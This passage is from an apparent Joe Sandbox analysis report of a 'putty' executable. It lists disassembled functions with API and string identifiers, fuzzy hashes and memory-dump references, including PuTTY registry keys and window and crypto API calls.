                                                          • Instruction ID: 8a62ab4c1c1ec414b69d5dafb86d90a745854bc63c9e52451734be493204dad4
                                                          • Opcode Fuzzy Hash: ae405cb676f9f078d210b7e0febeff7eca22efe9e191549535ece83b230609e1
                                                          • Instruction Fuzzy Hash: 6571C873A0E68295EB10AB12B810B7AF7A0FB85BD4F840131EE8D47B59DE3DE444DB14
                                                          Function 00007FF738AFBBC0 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 489COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: 0$f$p$p
                                                          • API String ID: 3215553584-1202675169
                                                          • Opcode ID: 6b212d5627d4d9c2a6e5091e424182c3b23d063288fd341f55745bd8bd3a1932
                                                          • Instruction ID: 37b7f2d54b438e5814dabf72485c47a7e95f22cf90239313f6f67428b99d1276
                                                          • Opcode Fuzzy Hash: 6b212d5627d4d9c2a6e5091e424182c3b23d063288fd341f55745bd8bd3a1932
                                                          • Instruction Fuzzy Hash: C312C333E0F153A6FB207B15D844A79E2A1EB80750FD44133E699476C4DF3EE592AB28
                                                          Function 00007FF738A57F58 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CapsChooseDeviceFontRelease
                                                          • String ID: h
                                                          • API String ID: 554219020-2439710439
                                                          • Opcode ID: 6332b23e5dfa65db9a908bb8c96c62a4984fc93d80c1687afe67e996eddfad0b
                                                          • Instruction ID: d2ec0dd63246300813295d260df3cabfbb663be431bcfaaed65add55b63532bd
                                                          • Opcode Fuzzy Hash: 6332b23e5dfa65db9a908bb8c96c62a4984fc93d80c1687afe67e996eddfad0b
                                                          • Instruction Fuzzy Hash: 3071F9B3A0D68699EB60AB21E4147BBF7A0EB45BC4F440235CA8D43B95DF3ED480D715
                                                          Function 00007FF738A5FA40 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 80libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                          • API String ID: 190572456-129414566
                                                          • Opcode ID: 004b206c5471ad85bb02341dd2521e91588945c9d925c7512e4323bad8f4c50c
                                                          • Instruction ID: c666fdf814b018377c20cbf7027592a68d2da845eb09b3811e5b781867bbe24f
                                                          • Opcode Fuzzy Hash: 004b206c5471ad85bb02341dd2521e91588945c9d925c7512e4323bad8f4c50c
                                                          • Instruction Fuzzy Hash: 8C3173B3A0AB03A5FE55FB11E8A0736E360AF84740FC44635D94D46260DF3EE845E62D
                                                          Function 00007FF738A31F9A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                                                          • String ID: (
                                                          • API String ID: 3620415003-3887548279
                                                          • Opcode ID: 4f22d1259d060ce1cbe66551f1a7515c5ec1e3c1a9dfa2ca336da061deb774b7
                                                          • Instruction ID: 6575654664ad086dd4af8050df6442f764d938442a34803d78e913682988ce8b
                                                          • Opcode Fuzzy Hash: 4f22d1259d060ce1cbe66551f1a7515c5ec1e3c1a9dfa2ca336da061deb774b7
                                                          • Instruction Fuzzy Hash: 4231D863A0E68261FB71AB21E454B7AE391EF84761F840231C95D426C5CF7FE845E325
                                                          Function 00007FF738A31F05 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                                                          • String ID: (
                                                          • API String ID: 3620415003-3887548279
                                                          • Opcode ID: 356902ac9acca245281dc81259579157d6fbc20153debc6d0c43a44659d8fafa
                                                          • Instruction ID: 96b5d7f88d82c77628da6cb4e203e467c89a4cfbfda730e786cf2fd0045fc69a
                                                          • Opcode Fuzzy Hash: 356902ac9acca245281dc81259579157d6fbc20153debc6d0c43a44659d8fafa
                                                          • Instruction Fuzzy Hash: 2931E863A0E68261FB71AB20E444B7AF391EF89761F840231C95D426D1CF7FE885E325
                                                          Function 00007FF738A31FA6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                                                          • String ID: (
                                                          • API String ID: 3620415003-3887548279
                                                          • Opcode ID: 684815918d71c28cd1a7cc4a13ab48144d8ef00458f650a35443704f38f6201f
                                                          • Instruction ID: 88316533f174be466011fa30b190fe6af1db56dd947cc5bd7339555dfeb382f0
                                                          • Opcode Fuzzy Hash: 684815918d71c28cd1a7cc4a13ab48144d8ef00458f650a35443704f38f6201f
                                                          • Instruction Fuzzy Hash: 6031E863A0E68261FB71AB21E444B7AF391EF84761F840231C95D426C1CF7FE845E325
                                                          Function 00007FF738A31FB4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                                                          • String ID: (
                                                          • API String ID: 3620415003-3887548279
                                                          • Opcode ID: 4e9abc388ab2ef5b6af433236c4546edd132eaeae81c80817ff72850ed0584e8
                                                          • Instruction ID: ea8c55eafaa7a72fbafca6c323862a02760eeece1820eefa84b5dfee7efa5d98
                                                          • Opcode Fuzzy Hash: 4e9abc388ab2ef5b6af433236c4546edd132eaeae81c80817ff72850ed0584e8
                                                          • Instruction Fuzzy Hash: DA31E463A0E68261FB71AB20E454B7AE3A1EF88751F840131C94D426C1CF7FE885E725
                                                          Function 00007FF738A69E00 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 66registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738A697E0: GetEnvironmentVariableA.KERNEL32 ref: 00007FF738A69995
                                                            • Part of subcall function 00007FF738A697E0: GetEnvironmentVariableA.KERNEL32 ref: 00007FF738A699AB
                                                            • Part of subcall function 00007FF738A697E0: GetWindowsDirectoryA.KERNEL32 ref: 00007FF738A69A15
                                                            • Part of subcall function 00007FF738A5A160: CoCreateInstance.OLE32(?,?,?,?,?,?,00007FF738A69E12), ref: 00007FF738A5A193
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A69E45
                                                          • RegDeleteKeyA.ADVAPI32 ref: 00007FF738A69E7C
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A69E91
                                                            • Part of subcall function 00007FF738A69F00: RegDeleteKeyA.ADVAPI32 ref: 00007FF738A69F26
                                                            • Part of subcall function 00007FF738A69F00: RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF738A69E42), ref: 00007FF738A69F70
                                                          • RegDeleteKeyA.ADVAPI32 ref: 00007FF738A69EDB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Close$Delete$CreateEnvironmentVariable$DirectoryInstanceWindows
                                                          • String ID: Software$Software\SimonTatham$Software\SimonTatham\PuTTY
                                                          • API String ID: 1055326402-1491235443
                                                          • Opcode ID: b90cf6bd07fd6fb521182397b13cf776ab7508255cead5d934bd6327e3e7fbbd
                                                          • Instruction ID: 6d7f934c89f91d28e63340df7ae9283d019fb62939787ed4f4185a6d539f61ee
                                                          • Opcode Fuzzy Hash: b90cf6bd07fd6fb521182397b13cf776ab7508255cead5d934bd6327e3e7fbbd
                                                          • Instruction Fuzzy Hash: 2E218022E0F60260F919B7A5A4117F9D1819F487A0FD41235ED1E067CAEE7FA042B36C
                                                          Function 00007FF738A78CD0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$Item
                                                          • String ID: '
                                                          • API String ID: 4195074732-1997036262
                                                          • Opcode ID: 74b4d8108d9193db64c8ba223df101fe393fbd358917c9eab547b15f2dfa108f
                                                          • Instruction ID: 892c3c18e31e6ac7d73b7b4e6c01c7ba21ba48660efa4c2f09211702fe6f22f7
                                                          • Opcode Fuzzy Hash: 74b4d8108d9193db64c8ba223df101fe393fbd358917c9eab547b15f2dfa108f
                                                          • Instruction Fuzzy Hash: 14F0D16271559142E6509B3A7C04B5AA641AFCAFF4F688330EE3D47BE4CF3D88439705
                                                          Function 00007FF738A55840 Relevance: 12.1, APIs: 8, Instructions: 78windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID:
                                                          • API String ID: 3015471070-0
                                                          • Opcode ID: f93d6b86cd041d8a3dd9f56b7eafb3e2b912a4165b6983f93cefb03ebf36bb7b
                                                          • Instruction ID: 88ee6e98532865d4978ebf987d2a76687a7c1ca1868cf49cb599125b6771b45b
                                                          • Opcode Fuzzy Hash: f93d6b86cd041d8a3dd9f56b7eafb3e2b912a4165b6983f93cefb03ebf36bb7b
                                                          • Instruction Fuzzy Hash: B92106227255605AE2709B03BD10FB69685BB8AFD8F084125BC8D47F84CF3DC7069B88
                                                          Function 00007FF738AEFE44 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 475COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: f$p$p
                                                          • API String ID: 3215553584-1995029353
                                                          • Opcode ID: 9fbd3fd91531b4627247c64885e35ed9c7696d219eed8e081392c136c2912068
                                                          • Instruction ID: 2f2b77c5f9084c4c8e17d2bcb522c2c3e4dfb6e59d1bcbbbff0b79aa50443375
                                                          • Opcode Fuzzy Hash: 9fbd3fd91531b4627247c64885e35ed9c7696d219eed8e081392c136c2912068
                                                          • Instruction Fuzzy Hash: 3112A423A0F243A6FB607E15E854AB9F652FB40754FC44137E6CA466C4DB3EE480B729
                                                          Function 00007FF738A69B10 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 159registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                            • Part of subcall function 00007FF738A73110: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000000,00000000,?,00007FF738A69B73), ref: 00007FF738A7314B
                                                            • Part of subcall function 00007FF738A73110: RegQueryValueExA.ADVAPI32 ref: 00007FF738A73190
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A69C4E
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A69D60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Close$QueryValue$Create
                                                          • String ID: Default Settings$Recent sessions$Software\SimonTatham\PuTTY\Jumplist$Software\SimonTatham\PuTTY\Sessions
                                                          • API String ID: 1827015023-773100466
                                                          • Opcode ID: baf68789944d61d44685153b0f362b87e17c9d93972af2ec7029f1a374bcddfd
                                                          • Instruction ID: c7d5fc697326c51ff30859baebc6c7aef0c92a233b969468da8242f1833011b2
                                                          • Opcode Fuzzy Hash: baf68789944d61d44685153b0f362b87e17c9d93972af2ec7029f1a374bcddfd
                                                          • Instruction Fuzzy Hash: F951B923A0E65266FA50BB129401B7AE291AF45BD4FC81031EE4D077DADE3EE401A768
                                                          Function 00007FF738AFB234 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 157COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: MZx
                                                          • API String ID: 3215553584-2575928145
                                                          • Opcode ID: 61b1f489ecd1c91699d374143caa174131a828fdbebced07042f56a6fde43186
                                                          • Instruction ID: 85c6a7beacb3ba3f3c09dd7c8d848837edb9534de21c5ef023ef52333cde18f9
                                                          • Opcode Fuzzy Hash: 61b1f489ecd1c91699d374143caa174131a828fdbebced07042f56a6fde43186
                                                          • Instruction Fuzzy Hash: 4751983390B74695E752AF21D85067DFBE49B05B44FC98032C6CC07746DE3E9446E326
                                                          Function 00007FF738A57B60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141registryclipboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Text$ClipboardDrawEdgeExtentFormatModePoint32Register
                                                          • String ID: commctrl_DragListMsg
                                                          • API String ID: 961708326-3283919134
                                                          • Opcode ID: d6deb4797f899332795a55db4fb1f7832d94278679131d8cde036f170a1f8b15
                                                          • Instruction ID: 011184f90abec9f2cdab21ffc74dad60a2a86a7342a68cae11c97f1d5fbc49dd
                                                          • Opcode Fuzzy Hash: d6deb4797f899332795a55db4fb1f7832d94278679131d8cde036f170a1f8b15
                                                          • Instruction Fuzzy Hash: 935119A3A0964696EA20EF15E850779F7A0FB88B94F844231DE8D03799DE3DE881D710
                                                          Function 00007FF738A36CF0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 131windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
